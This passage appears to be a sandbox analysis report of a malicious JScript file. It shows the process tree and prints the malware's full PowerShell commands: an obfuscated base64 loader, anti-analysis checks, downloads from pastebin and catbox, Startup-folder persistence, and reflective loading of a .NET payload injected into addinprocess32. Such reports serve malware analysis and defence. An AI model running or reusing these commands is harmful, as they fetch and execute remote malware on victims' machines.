'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'iAGoAcA' + [char]66 + 'tAGwAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAYg' + [char]66 + 'qAHAAbQ' + [char]66 + 'sACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XADsAIAAkAHAAUA' + [char]66 + 'DAGwAVwAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATw' + [char]66 + 'DAEoATA' + [char]66 + 'TACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAEkAeg' + [char]66 + 'qAHYAZAAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQASQ' + [char]66 + '' + [char]66 + 'AHkAWQ' + [char]66 + 'wACAAPQAgACQAbA' + [char]66 + 'tAEkATw' + [char]66 + 'hAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQASQ' + [char]66 + '6AGoAdg' + [char]66 + 'kACAAKQAgADsAJA' + [char]66 + 'WAGcAdg' + [char]66 + 'LAGEAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'JAEEAeQ' + [char]66 + 'ZAHAAKQA7ACQAVg' + [char]66 + 'nAHYASw' + [char]66 + 'hACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'PAEMASg' + [char]66 + 'MAFMAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATw' + [char]66 + 'NAEcAeA' + [char]66 + 'FACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lAEoATA' + [char]66 + 'ZAHgAZg' + [char]66 + 'GAHEALw' + [char]66 + '3AGEAcgAvAG0Abw' + [char]66 + 'jAC4Abg' + [char]66 + 'pAGIAZQ' + [char]66 + '0AHMAYQ' + [char]66 + 'wAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQAYwA6AFwAdw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAG0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AC4Abg' + [char]66 + 'lAHQAXA' + [char]66 + 'mAHIAYQ' + [char]66 + 'tAGUAdw' + [char]66 + 'vAHIAaw' + [char]66 + 'cAHYANAAuADAALgAzADAAMwAxADkAXA' + [char]66 + 'hAGQAZA' + [char]66 + 'pAG4AcA' + [char]66 + 'yAG8AYw' + [char]66 + 'lAHMAcwAzADIAJwAnACAAKQAgACkAOwAnADsAJA' + [char]66 + 'wAEwAbA' + [char]66 + 'VAE8AIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAOw' + [char]66 + '9ADsA';$SUopR = $SUopR.replace('革','B') ;$SUopR = [System.Convert]::FromBase64String( $SUopR ) ;;;$SUopR = [System.Text.Encoding]::Unicode.GetString( $SUopR ) ;$SUopR = $SUopR.replace('%DCPJU%','C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js') ;powershell $SUopR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qNSnG = $host.Version.Major.Equals(2);If ( $qNSnG ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$fcyzy = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$KhLaK = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $KhLaK ) {$fcyzy = $menos ;}else {$fcyzy = ($fcyzy) ;};$tzxdf = ( New-Object Net.WebClient ) ;$tzxdf.Encoding = [System.Text.Encoding]::UTF8 ;$tzxdf.DownloadFile($fcyzy, ($fbKNY + '\Upwin.msu') ) ;$rHWrT = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js' -Destination ( $rHWrT + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$bjpml = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$pPClW = $webClient.DownloadString( $bjpml ) ;$Stringbase = $pPClW; $pPClW = BaseMy;$pPClW | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$OCJLS = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$lmIOa = New-Object System.Net.WebClient ;$lmIOa.Encoding = [System.Text.Encoding]::UTF8 ;$Izjvd = ( Get-Content -Path $cZNqf ) ;$IAyYp = $lmIOa.DownloadData( $Izjvd ) ;$VgvKa = [System.Text.Encoding]::UTF8.GetString($IAyYp);$VgvKa | Out-File -FilePath $OCJLS -force ;$OMGxE = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$OMGxE += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$OMGxE += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$OMGxE += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$OMGxE += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''eJLYxfFq/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$pLlUO = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$OMGxE | Out-File -FilePath $pLlUO -force ;powershell -ExecutionPolicy Bypass -File $pLlUO ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4380

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js
1⤵
PID:2212

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js"
1⤵
- Checks computer location settings
PID:3604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SUopR = 'JA' + [char]66 + 'xAE4AUw' + [char]66 + 'uAEcAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'OAFMAbg' + [char]66 + 'HACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAApACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAoACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACkAIAA7AH0AOwAkAHQAeg' + [char]66 + '4AGQAZgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'mAGMAeQ' + [char]66 + '6AHkALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 